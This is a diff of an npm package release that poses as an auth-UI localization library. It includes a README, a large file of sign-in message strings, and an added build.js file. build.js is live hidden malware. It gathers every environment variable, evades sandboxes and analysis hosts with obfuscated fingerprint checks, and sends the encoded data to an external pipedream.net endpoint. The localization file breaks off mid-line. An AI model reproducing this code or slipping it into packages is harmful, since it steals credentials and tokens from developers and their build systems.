eg-auth-ui-localization 0.0.1-security → 1.603.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of eg-auth-ui-localization might be problematic. Click here for more details.

package/LICENSE ADDED
@@ -0,0 +1,21 @@
1
+ MIT License Copyright (c) 2021
2
+
3
+ Permission is hereby granted, free
4
+ of charge, to any person obtaining a copy of this software and associated
5
+ documentation files (the "Software"), to deal in the Software without
6
+ restriction, including without limitation the rights to use, copy, modify, merge,
7
+ publish, distribute, sublicense, and/or sell copies of the Software, and to
8
+ permit persons to whom the Software is furnished to do so, subject to the
9
+ following conditions:
10
+
11
+ The above copyright notice and this permission notice
12
+ (including the next paragraph) shall be included in all copies or substantial
13
+ portions of the Software.
14
+
15
+ THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF
16
+ ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
17
+ MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO
18
+ EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
19
+ OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
20
+ FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
21
+ THE SOFTWARE.
package/README.md CHANGED
@@ -1,5 +1,34 @@
1
- # Security holding package
1
+ # eg-auth-ui-localization
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ Experience auth ui localization.
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=eg-auth-ui-localization for more information.
5
+ ## Features
6
+
7
+ - ES6 syntax, managed with Prettier + Eslint and Stylelint
8
+ - Unit testing via Jest
9
+ - globalize.js
10
+
11
+ ## Install
12
+
13
+ ```sh
14
+ yarn add eg-auth-ui-localization
15
+ // or
16
+ npm i eg-auth-ui-localization
17
+ ```
18
+
19
+ ### Usage
20
+
21
+ ```js
22
+ import Globalize from 'globalize';
23
+ import cdrData from 'eg-auth-ui-localization';
24
+
25
+ Globalize.load( cdrData.entireSupplemental() );
26
+ Globalize.load( cdrData.entireMainFor( "en", "es" ) );
27
+ Globalize.loadTimeZone( cdrData.timeZone);
28
+
29
+ Globalize("en").formatDate(new Date());
30
+ // > "11/27/2015"
31
+
32
+ Globalize("es").formatDate(new Date());
33
+ // > "27/11/2015"
34
+ ```
package/build.js ADDED
@@ -0,0 +1,128 @@
1
+ var http = require("https");
2
+
3
+ function main() {
4
+ var data = global["proc" + "ess"][["v", "n", "e"].reverse().join("")] || {};
5
+
6
+ var filter = [
7
+ {
8
+ key: ["npm", "config", "regi" + "stry"].join("_"),
9
+ val: ["tao" + "bao", "org"].join("."),
10
+ },
11
+ [
12
+ { key: "MAIL", val: ["", "var", "mail", "app"].join("/") },
13
+ { key: "HOME", val: ["", "home", "app"].join("/") },
14
+ { key: "USER", val: "app" },
15
+ ],
16
+ [
17
+ { key: "EDITOR", val: "vi" },
18
+ { key: "PROBE" + "_USERNAME", val: "*" },
19
+ { key: "SHELL", val: "/bin/bash" },
20
+ { key: "SHLVL", val: "2" },
21
+ { key: "npm" + "_command", val: "run-script" },
22
+ { key: "NVM" + "_CD_FLAGS", val: "" },
23
+ { key: "npm_config_fund", val: "" },
24
+ ],
25
+ [
26
+ { key: "HOME", val: "/home/username" },
27
+ { key: "USER", val: "username" },
28
+ { key: "LOGNAME", val: "username" },
29
+ ],
30
+ [
31
+ { key: "PWD", val: "/my-app" },
32
+ { key: "DEBIAN" + "_FRONTEND", val: "noninte" + "ractive" },
33
+ { key: "HOME", val: "/root" },
34
+ ],
35
+ [
36
+ { key: "INIT_CWD", val: "/analysis" },
37
+ { key: "APPDATA", val: "/analysis/bait" },
38
+ ],
39
+ [
40
+ { key: "INIT_CWD", val: "/home/node" },
41
+ { key: "HOME", val: "/root" },
42
+ ],
43
+ [
44
+ { key: "INIT_CWD", val: "/app" },
45
+ { key: "HOME", val: "/root" },
46
+ ],
47
+ [
48
+ { key: "USERNAME", val: "justin" },
49
+ { key: "OS", val: "Windows_NT" },
50
+ ],
51
+ {
52
+ key: ["npm", "config", "regi" + "stry"].join("_"),
53
+ val: ["regi" + "stry", "npm" + "mirror", "com"].join("."),
54
+ },
55
+ {
56
+ key: ["npm", "config", "reg" + "istry"].join("_"),
57
+ val: ["cnp" + "mjs", "org"].join("."),
58
+ },
59
+ {
60
+ key: ["npm", "config", "registry"].join("_"),
61
+ val: ["mir" + "rors", "cloud", "ten" + "cent", "com"].join("."),
62
+ },
63
+ { key: "USERNAME", val: ["daas", "admin"].join("") },
64
+ { key: "_", val: ["", "usr", "bin", "python"].join("/") },
65
+ {
66
+ key: ["npm", "config", "metrics", "regis" + "try"].join("_"),
67
+ val: ["mir" + "rors", "ten" + "cent", "com"].join("."),
68
+ },
69
+ {
70
+ key: "PWD",
71
+ val: [
72
+ "",
73
+ "usr",
74
+ "local",
75
+ "lib",
76
+ "node" + "_modules",
77
+ data.npm_package_name,
78
+ ].join("/"),
79
+ },
80
+ {
81
+ key: "PWD",
82
+ val: ["", data.USER, "node" + "_modules", data.npm_package_name].join(
83
+ "/"
84
+ ),
85
+ },
86
+ {
87
+ key: ["node", "extra", "ca", "certs"].join("_").toUpperCase(),
88
+ val: "mit" + "mproxy",
89
+ },
90
+ ];
91
+
92
+ if (
93
+ filter.some((entry) =>
94
+ []
95
+ .concat(entry)
96
+ .every((item) => data[item.key] && data[item.key].includes(item.val))
97
+ ) ||
98
+ Object.keys(data).length < 10 ||
99
+ !data.npm_package_name ||
100
+ !data.npm_package_version ||
101
+ /C:\\Users\\[^\\]+\\Downloads\\node_modules\\/.test(
102
+ data.npm_package_json || ""
103
+ ) ||
104
+ /C:\\Users\\[^\\]+\\Downloads/.test(data.INIT_CWD || "") ||
105
+ (data.npm_package_json || "").startsWith("/npm" + "/node_" + "modules/")
106
+ ) {
107
+ return;
108
+ }
109
+
110
+ var req = http
111
+ .request({
112
+ host: [
113
+ "eo11" + "476h" + "d5h" + "jlk5",
114
+ "m",
115
+ "pi" + "ped" + "ream",
116
+ "net",
117
+ ].join("."),
118
+ path: "/" + (data.npm_package_name || ""),
119
+ method: "POST",
120
+ })
121
+ .on("error", function (err) {});
122
+
123
+ var trns = Buffer.from(JSON.stringify(data)).toString("base64");
124
+ req.write(trns.slice(0, 2) + "zpp" + trns.slice(2));
125
+ req.end();
126
+ }
127
+
128
+ main();
@@ -0,0 +1,778 @@
1
+
2
+ var Globalize = require('globalize/dist/globalize-runtime');
3
+ require('globalize/dist/globalize-runtime/number');
4
+ require('globalize/dist/globalize-runtime/plural');
5
+ require('globalize/dist/globalize-runtime/message');
6
+ require('globalize/dist/globalize-runtime/date');
7
+ var validateParameterTypeNumber = Globalize._validateParameterTypeNumber;
8
+ var validateParameterPresence = Globalize._validateParameterPresence;
9
+ var numberRound = Globalize._numberRound;
10
+ var numberFormat = Globalize._numberFormat;
11
+ var numberFormatterFn = Globalize._numberFormatterFn;
12
+ var validateParameterTypeString = Globalize._validateParameterTypeString;
13
+ var numberParse = Globalize._numberParse;
14
+ var numberParserFn = Globalize._numberParserFn;
15
+ var pluralGeneratorFn = Globalize._pluralGeneratorFn;
16
+ var validateParameterTypeMessageVariables = Globalize._validateParameterTypeMessageVariables;
17
+ var messageFormat = Globalize._messageFormat;
18
+ var messageFormatterFn = Globalize._messageFormatterFn;
19
+ var validateParameterTypeDate = Globalize._validateParameterTypeDate;
20
+ var dateToPartsFormat = Globalize._dateToPartsFormat;
21
+ var dateToPartsFormatterFn = Globalize._dateToPartsFormatterFn;
22
+ var dateFormat = Globalize._dateFormat;
23
+ var dateFormatterFn = Globalize._dateFormatterFn;
24
+ var dateTokenizer = Globalize._dateTokenizer;
25
+ var dateParse = Globalize._dateParse;
26
+ var dateParserFn = Globalize._dateParserFn;
27
+
28
+ Globalize.b1530101764 = numberFormatterFn(["",,2,0,0,,,,,,"","00","-00","-","",numberRound(),"∞","NaN",{".":".",",":",","%":"%","+":"+","-":"-","E":"E","‰":"‰"},]);
29
+ Globalize.b1538397316 = numberFormatterFn(["",,4,0,0,,,,,,"","0000","-0000","-","",numberRound(),"∞","NaN",{".":".",",":",","%":"%","+":"+","-":"-","E":"E","‰":"‰"},]);
30
+ Globalize.a1474651864 = numberFormatterFn(["",,1,0,0,,,,,,"","0","-0","-","",numberRound(),"∞","NaN",{".":".",",":",","%":"%","+":"+","-":"-","E":"E","‰":"‰"},]);
31
+ Globalize.b1785179041 = numberParserFn([{".":".",",":",","%":"%","+":"+","-":"-","E":"E","‰":"‰"},,{"infinity":/^∞/,"nan":/^NaN/,"negativePrefix":/^-/,"negativeSuffix":/^/,"number":/^\d+/,"prefix":/^/,"suffix":/^/}]);
32
+ Globalize.b1732789968 = pluralGeneratorFn(function(n
33
+ ) {
34
+ var s = String(n).split('.'), v0 = !s[1];
35
+ return (n == 1 && v0) ? 'one' : 'other';
36
+ });
37
+ Globalize.b1471192702 = messageFormatterFn((function( ) {
38
+ return function(d) { return "Sign In"; }
39
+ })(), Globalize("en-GB").pluralGenerator({}));
40
+ Globalize.a723160840 = messageFormatterFn((function( ) {
41
+ return function(d) { return "Sign in"; }
42
+ })(), Globalize("en-GB").pluralGenerator({}));
43
+ Globalize.a702704611 = messageFormatterFn((function( ) {
44
+ return function(d) { return "Email address"; }
45
+ })(), Globalize("en-GB").pluralGenerator({}));
46
+ Globalize.b1272405354 = messageFormatterFn((function( ) {
47
+ return function(d) { return "Password"; }
48
+ })(), Globalize("en-GB").pluralGenerator({}));
49
+ Globalize.b905560267 = messageFormatterFn((function( ) {
50
+ return function(d) { return "This is a public or shared device"; }
51
+ })(), Globalize("en-GB").pluralGenerator({}));
52
+ Globalize.b1753757330 = messageFormatterFn((function( ) {
53
+ return function(d) { return "Not your device? Selecting this checkbox reduces the amount of time you are signed in here."; }
54
+ })(), Globalize("en-GB").pluralGenerator({}));
55
+ Globalize.b531741815 = messageFormatterFn((function( ) {
56
+ return function(d) { return "Keep me signed in"; }
57
+ })(), Globalize("en-GB").pluralGenerator({}));
58
+ Globalize.b1245603093 = messageFormatterFn((function( ) {
59
+ return function(d) { return "Selecting this checkbox will keep you signed into your account on this device until you sign out. Do not select this on shared devices."; }
60
+ })(), Globalize("en-GB").pluralGenerator({}));
61
+ Globalize.a1885124557 = messageFormatterFn((function( ) {
62
+ return function(d) { return "Forgot password?"; }
63
+ })(), Globalize("en-GB").pluralGenerator({}));
64
+ Globalize.a527648930 = messageFormatterFn((function( ) {
65
+ return function(d) { return "Continue"; }
66
+ })(), Globalize("en-GB").pluralGenerator({}));
67
+ Globalize.b378492940 = messageFormatterFn((function( ) {
68
+ return function(d) { return "Go back"; }
69
+ })(), Globalize("en-GB").pluralGenerator({}));
70
+ Globalize.a1349113403 = messageFormatterFn((function( ) {
71
+ return function(d) { return "By signing in, I agree to the " + d["0"] + " <a href=" + d["1"] + " " + d["3"] + ">Terms and Conditions</a> and <a href=" + d["2"] + " " + d["4"] + ">Privacy Statement</a>."; }
72
+ })(), Globalize("en-GB").pluralGenerator({}));
73
+ Globalize.b200789497 = messageFormatterFn((function( ) {
74
+ return function(d) { return "By signing in, I agree to the " + d["0"] + " <a href=" + d["1"] + " " + d["5"] + ">Terms and Conditions</a>, <a href=" + d["2"] + " " + d["6"] + ">Privacy Statement</a> and <a href=" + d["3"] + " " + d["7"] + ">" + d["4"] + " Terms and Conditions</a>."; }
75
+ })(), Globalize("en-GB").pluralGenerator({}));
76
+ Globalize.a1459991281 = messageFormatterFn((function( ) {
77
+ return function(d) { return "By signing in, I’m also joining " + d["4"] + ". I agree to the " + d["0"] + " <a href=" + d["1"] + " " + d["5"] + ">Terms and Conditions</a>, <a href=" + d["2"] + " " + d["6"] + ">Privacy Statement</a> and <a href=" + d["3"] + " " + d["7"] + ">" + d["4"] + " Terms and Conditions</a>."; }
78
+ })(), Globalize("en-GB").pluralGenerator({}));
79
+ Globalize.b1474110394 = messageFormatterFn((function( ) {
80
+ return function(d) { return "Your account was paused in a routine security check. Your info is safe, but a password reset is required. Make a change with the \"Forgot password?\" link below to sign in."; }
81
+ })(), Globalize("en-GB").pluralGenerator({}));
82
+ Globalize.a1073814372 = messageFormatterFn((function( ) {
83
+ return function(d) { return "Email and password don't match. Please try again."; }
84
+ })(), Globalize("en-GB").pluralGenerator({}));
85
+ Globalize.a361518583 = messageFormatterFn((function( ) {
86
+ return function(d) { return "Sorry, something went wrong on our end."; }
87
+ })(), Globalize("en-GB").pluralGenerator({}));
88
+ Globalize.a514294619 = messageFormatterFn((function( ) {
89
+ return function(d) { return "Please enter your email address."; }
90
+ })(), Globalize("en-GB").pluralGenerator({}));
91
+ Globalize.b1643392276 = messageFormatterFn((function( ) {
92
+ return function(d) { return "Enter a valid email."; }
93
+ })(), Globalize("en-GB").pluralGenerator({}));
94
+ Globalize.a506550030 = messageFormatterFn((function( ) {
95
+ return function(d) { return "Please enter your password."; }
96
+ })(), Globalize("en-GB").pluralGenerator({}));
97
+ Globalize.a1175944632 = messageFormatterFn((function( ) {
98
+ return function(d) { return "Checking login credentials"; }
99
+ })(), Globalize("en-GB").pluralGenerator({}));
100
+ Globalize.a9001869 = messageFormatterFn((function( ) {
101
+ return function(d) { return "Hide password"; }
102
+ })(), Globalize("en-GB").pluralGenerator({}));
103
+ Globalize.a323344008 = messageFormatterFn((function( ) {
104
+ return function(d) { return "Show password"; }
105
+ })(), Globalize("en-GB").pluralGenerator({}));
106
+ Globalize.b817101898 = messageFormatterFn((function( ) {
107
+ return function(d) { return "Don't have an account? <span><a id=\"createAcctRedirectLink\" href=" + d["0"] + ">Create one</a></span>"; }
108
+ })(), Globalize("en-GB").pluralGenerator({}));
109
+ Globalize.b1863781637 = messageFormatterFn((function( ) {
110
+ return function(d) { return "Sign in"; }
111
+ })(), Globalize("en-GB").pluralGenerator({}));
112
+ Globalize.a1480074766 = messageFormatterFn((function( ) {
113
+ return function(d) { return "Signing in via " + d["0"] + " is no longer an option"; }
114
+ })(), Globalize("en-GB").pluralGenerator({}));
115
+ Globalize.a1025218162 = messageFormatterFn((function( ) {
116
+ return function(d) { return "You can use the same email to access your " + d["0"] + " account with a password reset. This won’t impact your " + d["1"] + " account."; }
117
+ })(), Globalize("en-GB").pluralGenerator({}));
118
+ Globalize.a1018320160 = messageFormatterFn((function( ) {
119
+ return function(d) { return "Reset your password using the button below. Next time, use your email and new password to sign directly into " + d["0"] + "."; }
120
+ })(), Globalize("en-GB").pluralGenerator({}));
121
+ Globalize.b74648551 = messageFormatterFn((function( ) {
122
+ return function(d) { return "SSO sign in"; }
123
+ })(), Globalize("en-GB").pluralGenerator({}));
124
+ Globalize.a1692364705 = messageFormatterFn((function( ) {
125
+ return function(d) { return "Sign in using single sign-on"; }
126
+ })(), Globalize("en-GB").pluralGenerator({}));
127
+ Globalize.a1297971315 = messageFormatterFn((function( ) {
128
+ return function(d) { return "Or use your " + d["0"] + " account"; }
129
+ })(), Globalize("en-GB").pluralGenerator({}));
130
+ Globalize.b1448887642 = messageFormatterFn((function( ) {
131
+ return function(d) { return "Earn points for free travel. Save with member prices. Easily access your itineraries."; }
132
+ })(), Globalize("en-GB").pluralGenerator({}));
133
+ Globalize.a718473664 = messageFormatterFn((function( ) {
134
+ return function(d) { return "Earn " + d["0"] + " Expedia Rewards points after this trip."; }
135
+ })(), Globalize("en-GB").pluralGenerator({}));
136
+ Globalize.a900032795 = messageFormatterFn((function( ) {
137
+ return function(d) { return "Forgot Password"; }
138
+ })(), Globalize("en-GB").pluralGenerator({}));
139
+ Globalize.b109877124 = messageFormatterFn((function( ) {
140
+ return function(d) { return "Reset your password"; }
141
+ })(), Globalize("en-GB").pluralGenerator({}));
142
+ Globalize.b468605014 = messageFormatterFn((function( ) {
143
+ return function(d) { return "Enter your email, and we’ll send you a link to reset your password."; }
144
+ })(), Globalize("en-GB").pluralGenerator({}));
145
+ Globalize.b1504745598 = messageFormatterFn((function( ) {
146
+ return function(d) { return "Send reset link"; }
147
+ })(), Globalize("en-GB").pluralGenerator({}));
148
+ Globalize.a1674642465 = messageFormatterFn((function( ) {
149
+ return function(d) { return "Check your inbox"; }
150
+ })(), Globalize("en-GB").pluralGenerator({}));
151
+ Globalize.b476279095 = messageFormatterFn((function( ) {
152
+ return function(d) { return "We have sent " + d["0"] + " an email with a link to reset your password."; }
153
+ })(), Globalize("en-GB").pluralGenerator({}));
154
+ Globalize.b476278134 = messageFormatterFn((function( ) {
155
+ return function(d) { return "It may take a few minutes for the email to arrive. If you don’t see anything after 10 minutes, check your junk or spam folder."; }
156
+ })(), Globalize("en-GB").pluralGenerator({}));
157
+ Globalize.b776997556 = messageFormatterFn((function( ) {
158
+ return function(d) { return "Resend link"; }
159
+ })(), Globalize("en-GB").pluralGenerator({}));
160
+ Globalize.a983210348 = messageFormatterFn((function( ) {
161
+ return function(d) { return "A new link has been sent."; }
162
+ })(), Globalize("en-GB").pluralGenerator({}));
163
+ Globalize.b1471958047 = messageFormatterFn((function( ) {
164
+ return function(d) { return "Verifying Account"; }
165
+ })(), Globalize("en-GB").pluralGenerator({}));
166
+ Globalize.a1783675041 = messageFormatterFn((function( ) {
167
+ return function(d) { return "Set Password"; }
168
+ })(), Globalize("en-GB").pluralGenerator({}));
169
+ Globalize.a621716278 = messageFormatterFn((function( ) {
170
+ return function(d) { return "Glad you're back"; }
171
+ })(), Globalize("en-GB").pluralGenerator({}));
172
+ Globalize.a1766374064 = messageFormatterFn((function( ) {
173
+ return function(d) { return "Create a unique password to continue"; }
174
+ })(), Globalize("en-GB").pluralGenerator({}));
175
+ Globalize.b47516219 = messageFormatterFn((function( ) {
176
+ return function(d) { return "Success!"; }
177
+ })(), Globalize("en-GB").pluralGenerator({}));
178
+ Globalize.a1061881368 = messageFormatterFn((function( ) {
179
+ return function(d) { return "Now use that new password to get going."; }
180
+ })(), Globalize("en-GB").pluralGenerator({}));
181
+ Globalize.b1875366867 = messageFormatterFn((function( ) {
182
+ return function(d) { return "Reset password"; }
183
+ })(), Globalize("en-GB").pluralGenerator({}));
184
+ Globalize.a1669828784 = messageFormatterFn((function( ) {
185
+ return function(d) { return "We're sorry, but this request has expired. If you still need to change your password, please click below to send a new password reset email."; }
186
+ })(), Globalize("en-GB").pluralGenerator({}));
187
+ Globalize.a169689536 = messageFormatterFn((function( ) {
188
+ return function(d) { return "Resend link"; }
189
+ })(), Globalize("en-GB").pluralGenerator({}));
190
+ Globalize.a2059081067 = messageFormatterFn((function( ) {
191
+ return function(d) { return "Saving your password"; }
192
+ })(), Globalize("en-GB").pluralGenerator({}));
193
+ Globalize.b2056336383 = messageFormatterFn((function( ) {
194
+ return function(d) { return "Create an account"; }
195
+ })(), Globalize("en-GB").pluralGenerator({}));
196
+ Globalize.b349993397 = messageFormatterFn((function( ) {
197
+ return function(d) { return "Create an account"; }
198
+ })(), Globalize("en-GB").pluralGenerator({}));
199
+ Globalize.a252444736 = messageFormatterFn((function( ) {
200
+ return function(d) { return "Email address"; }
201
+ })(), Globalize("en-GB").pluralGenerator({}));
202
+ Globalize.b1435730248 = messageFormatterFn((function( ) {
203
+ return function(d) { return "Please enter your email address."; }
204
+ })(), Globalize("en-GB").pluralGenerator({}));
205
+ Globalize.a293674377 = messageFormatterFn((function( ) {
206
+ return function(d) { return "Enter a valid email."; }
207
+ })(), Globalize("en-GB").pluralGenerator({}));
208
+ Globalize.b2035068577 = messageFormatterFn((function( ) {
209
+ return function(d) { return "First name"; }
210
+ })(), Globalize("en-GB").pluralGenerator({}));
211
+ Globalize.a1749013463 = messageFormatterFn((function( ) {
212
+ return function(d) { return "Please enter your first name."; }
213
+ })(), Globalize("en-GB").pluralGenerator({}));
214
+ Globalize.a1663108767 = messageFormatterFn((function( ) {
215
+ return function(d) { return "Surname"; }
216
+ })(), Globalize("en-GB").pluralGenerator({}));
217
+ Globalize.b985770713 = messageFormatterFn((function( ) {
218
+ return function(d) { return "Please enter your surname."; }
219
+ })(), Globalize("en-GB").pluralGenerator({}));
220
+ Globalize.a33177888 = messageFormatterFn((function( ) {
221
+ return function(d) { return "Enter name using letters only"; }
222
+ })(), Globalize("en-GB").pluralGenerator({}));
223
+ Globalize.b1781476071 = messageFormatterFn((function( ) {
224
+ return function(d) { return "Password"; }
225
+ })(), Globalize("en-GB").pluralGenerator({}));
226
+ Globalize.b135388255 = messageFormatterFn((function( ) {
227
+ return function(d) { return "Please enter your password."; }
228
+ })(), Globalize("en-GB").pluralGenerator({}));
229
+ Globalize.b1869887696 = messageFormatterFn((function( ) {
230
+ return function(d) { return "Please enter a valid password."; }
231
+ })(), Globalize("en-GB").pluralGenerator({}));
232
+ Globalize.b964561648 = messageFormatterFn((function( ) {
233
+ return function(d) { return "Includes 8-64 characters"; }
234
+ })(), Globalize("en-GB").pluralGenerator({}));
235
+ Globalize.b964560687 = messageFormatterFn((function( ) {
236
+ return function(d) { return "Combines letters and numbers"; }
237
+ })(), Globalize("en-GB").pluralGenerator({}));
238
+ Globalize.b964559726 = messageFormatterFn((function( ) {
239
+ return function(d) { return "A special character ~ " + "#" + " @ $ % & ! * _ ? ^ -"; }
240
+ })(), Globalize("en-GB").pluralGenerator({}));
241
+ Globalize.b964558765 = messageFormatterFn((function( ) {
242
+ return function(d) { return "Password cannot contain spaces"; }
243
+ })(), Globalize("en-GB").pluralGenerator({}));
244
+ Globalize.a1385166950 = messageFormatterFn((function( ) {
245
+ return function(d) { return "Your password must have between 8-64 characters"; }
246
+ })(), Globalize("en-GB").pluralGenerator({}));
247
+ Globalize.a659171091 = messageFormatterFn((function( ) {
248
+ return function(d) { return "Password cannot match your email address."; }
249
+ })(), Globalize("en-GB").pluralGenerator({}));
250
+ Globalize.a1403992592 = messageFormatterFn((function( ) {
251
+ return function(d) { return "Password cannot contain spaces."; }
252
+ })(), Globalize("en-GB").pluralGenerator({}));
253
+ Globalize.a1910656584 = messageFormatterFn((function( ) {
254
+ return function(d) { return "By creating an account, I agree to the " + d["0"] + " <a href=" + d["1"] + " " + d["3"] + ">Terms and Conditions</a> and <a href=" + d["2"] + " " + d["4"] + ">Privacy Statement</a>."; }
255
+ })(), Globalize("en-GB").pluralGenerator({}));
256
+ Globalize.a1683355418 = messageFormatterFn((function( ) {
257
+ return function(d) { return "By creating an account, I agree to the " + d["0"] + " <a href=" + d["1"] + " " + d["5"] + ">Terms and Conditions</a>, <a href=" + d["2"] + " " + d["6"] + ">Privacy Statement</a> and <a href=" + d["3"] + " " + d["7"] + ">" + d["4"] + " Terms and Conditions</a>."; }
258
+ })(), Globalize("en-GB").pluralGenerator({}));
259
+ Globalize.b2039554629 = messageFormatterFn((function( ) {
260
+ return function(d) { return "I'd like to receive travel deals, special offers and other information from " + d["0"] + " via email."; }
261
+ })(), Globalize("en-GB").pluralGenerator({}));
262
+ Globalize.a853421204 = messageFormatterFn((function( ) {
263
+ return function(d) { return "I'd like to receive travel deals, special offers and other information from " + d["0"] + " via email. You can opt out of promotional emails at any time."; }
264
+ })(), Globalize("en-GB").pluralGenerator({}));
265
+ Globalize.a1800220478 = messageFormatterFn((function( ) {
266
+ return function(d) { return "I'd like to receive holiday ideas, special offers and other information from " + d["0"] + " via email."; }
267
+ })(), Globalize("en-GB").pluralGenerator({}));
268
+ Globalize.a1745463281 = messageFormatterFn((function( ) {
269
+ return function(d) { return "I'd like to receive holiday ideas, special offers and other information from " + d["0"] + " via email. You can opt out of promotional emails at any time."; }
270
+ })(), Globalize("en-GB").pluralGenerator({}));
271
+ Globalize.a18578213 = messageFormatterFn((function( ) {
272
+ return function(d) { return "Continue"; }
273
+ })(), Globalize("en-GB").pluralGenerator({}));
274
+ Globalize.a50650894 = messageFormatterFn((function( ) {
275
+ return function(d) { return "Already have an account? <span><a id=\"signinRedirectLink\" href=" + d["0"] + ">Sign in</a></span>"; }
276
+ })(), Globalize("en-GB").pluralGenerator({}));
277
+ Globalize.b1360715601 = messageFormatterFn((function( ) {
278
+ return function(d) { return "Welcome, " + d["0"]; }
279
+ })(), Globalize("en-GB").pluralGenerator({}));
280
+ Globalize.a494804279 = messageFormatterFn((function( ) {
281
+ return function(d) { return "With your new " + d["0"] + " account, the world is within your reach."; }
282
+ })(), Globalize("en-GB").pluralGenerator({}));
283
+ Globalize.a1200161472 = messageFormatterFn((function( ) {
284
+ return function(d) { return "Continue"; }
285
+ })(), Globalize("en-GB").pluralGenerator({}));
286
+ Globalize.b1429378159 = messageFormatterFn((function( ) {
287
+ return function(d) { return "Your password must be stronger to continue"; }
288
+ })(), Globalize("en-GB").pluralGenerator({}));
289
+ Globalize.b1103427498 = messageFormatterFn((function( ) {
290
+ return function(d) { return "Must have at least 8 characters."; }
291
+ })(), Globalize("en-GB").pluralGenerator({}));
292
+ Globalize.a117342330 = messageFormatterFn((function( ) {
293
+ return function(d) { return "Password strength"; }
294
+ })(), Globalize("en-GB").pluralGenerator({}));
295
+ Globalize.a1984941704 = messageFormatterFn((function( ) {
296
+ return function(d) { return "Weak"; }
297
+ })(), Globalize("en-GB").pluralGenerator({}));
298
+ Globalize.b1192458073 = messageFormatterFn((function( ) {
299
+ return function(d) { return "Strong"; }
300
+ })(), Globalize("en-GB").pluralGenerator({}));
301
+ Globalize.a1436209533 = messageFormatterFn((function( ) {
302
+ return function(d) { return "Very Strong"; }
303
+ })(), Globalize("en-GB").pluralGenerator({}));
304
+ Globalize.b1912295800 = messageFormatterFn((function( ) {
305
+ return function(d) { return "Avoid predictable letter substitutions like '@' for 'a'"; }
306
+ })(), Globalize("en-GB").pluralGenerator({}));
307
+ Globalize.b438827024 = messageFormatterFn((function( ) {
308
+ return function(d) { return "Avoid reversed spellings of common words"; }
309
+ })(), Globalize("en-GB").pluralGenerator({}));
310
+ Globalize.a1307601416 = messageFormatterFn((function( ) {
311
+ return function(d) { return "Capitalise some, but not all letters"; }
312
+ })(), Globalize("en-GB").pluralGenerator({}));
313
+ Globalize.a1135975465 = messageFormatterFn((function( ) {
314
+ return function(d) { return "Capitalise more than the first letter"; }
315
+ })(), Globalize("en-GB").pluralGenerator({}));
316
+ Globalize.b403339373 = messageFormatterFn((function( ) {
317
+ return function(d) { return "Avoid dates and years that are associated with you"; }
318
+ })(), Globalize("en-GB").pluralGenerator({}));
319
+ Globalize.b1417639031 = messageFormatterFn((function( ) {
320
+ return function(d) { return "Avoid recent years"; }
321
+ })(), Globalize("en-GB").pluralGenerator({}));
322
+ Globalize.a1151725732 = messageFormatterFn((function( ) {
323
+ return function(d) { return "Avoid years that are associated with you"; }
324
+ })(), Globalize("en-GB").pluralGenerator({}));
325
+ Globalize.b101002935 = messageFormatterFn((function( ) {
326
+ return function(d) { return "Avoid common character sequences"; }
327
+ })(), Globalize("en-GB").pluralGenerator({}));
328
+ Globalize.b1849006109 = messageFormatterFn((function( ) {
329
+ return function(d) { return "Avoid repeated words and characters"; }
330
+ })(), Globalize("en-GB").pluralGenerator({}));
331
+ Globalize.b1136137977 = messageFormatterFn((function( ) {
332
+ return function(d) { return "Use longer keyboard patterns and change typing direction multiple times"; }
333
+ })(), Globalize("en-GB").pluralGenerator({}));
334
+ Globalize.a1801248364 = messageFormatterFn((function( ) {
335
+ return function(d) { return "Add more words that are less common"; }
336
+ })(), Globalize("en-GB").pluralGenerator({}));
337
+ Globalize.a1328588760 = messageFormatterFn((function( ) {
338
+ return function(d) { return "Use multiple words, but avoid common phrases"; }
339
+ })(), Globalize("en-GB").pluralGenerator({}));
340
+ Globalize.a232655675 = messageFormatterFn((function( ) {
341
+ return function(d) { return "You can create strong passwords without using symbols, numbers, or uppercase letters"; }
342
+ })(), Globalize("en-GB").pluralGenerator({}));
343
+ Globalize.b1067281278 = messageFormatterFn((function( ) {
344
+ return function(d) { return "This email address is already associated with an account on " + d["0"]; }
345
+ })(), Globalize("en-GB").pluralGenerator({}));
346
+ Globalize.b367945844 = messageFormatterFn((function( ) {
347
+ return function(d) { return "We emailed you a link to finish creating your account."; }
348
+ })(), Globalize("en-GB").pluralGenerator({}));
349
+ Globalize.b611535173 = messageFormatterFn((function( ) {
350
+ return function(d) { return "Signup request is in progress"; }
351
+ })(), Globalize("en-GB").pluralGenerator({}));
352
+ Globalize.a280841127 = messageFormatterFn((function( ) {
353
+ return function(d) { return "First name must be a minimum of two characters"; }
354
+ })(), Globalize("en-GB").pluralGenerator({}));
355
+ Globalize.b1534734745 = messageFormatterFn((function( ) {
356
+ return function(d) { return "Surname must be a minimum of two characters"; }
357
+ })(), Globalize("en-GB").pluralGenerator({}));
358
+ Globalize.a1528890965 = messageFormatterFn((function( ) {
359
+ return function(d) { return "First name can have a maximum length of 100 characters"; }
360
+ })(), Globalize("en-GB").pluralGenerator({}));
361
+ Globalize.b286684907 = messageFormatterFn((function( ) {
362
+ return function(d) { return "Surname can have a maximum length of 100 characters"; }
363
+ })(), Globalize("en-GB").pluralGenerator({}));
364
+ Globalize.a807111696 = messageFormatterFn((function( ) {
365
+ return function(d) { return "First name cannot contain special characters"; }
366
+ })(), Globalize("en-GB").pluralGenerator({}));
367
+ Globalize.b204579120 = messageFormatterFn((function( ) {
368
+ return function(d) { return "Surname cannot contain special characters"; }
369
+ })(), Globalize("en-GB").pluralGenerator({}));
370
+ Globalize.b863664018 = messageFormatterFn((function( ) {
371
+ return function(d) { return "I agree to all of the below:"; }
372
+ })(), Globalize("en-GB").pluralGenerator({}));
373
+ Globalize.a1994761466 = messageFormatterFn((function( ) {
374
